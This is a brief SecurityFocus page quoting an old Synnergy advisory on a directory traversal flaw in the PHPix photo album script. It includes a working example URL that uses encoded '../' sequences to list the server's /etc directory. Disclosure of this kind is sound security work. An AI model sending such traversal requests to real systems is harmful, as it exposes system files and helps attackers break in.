PHPix Directory Traversal Vulnerability

From Synnergy advisory SLA-2000-15:

Example:

http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0

The above line if given will output all the directories that are nested within /etc
directory. Other more sinister content can be revealed from there.


 

Privacy Statement
Copyright 2010, SecurityFocus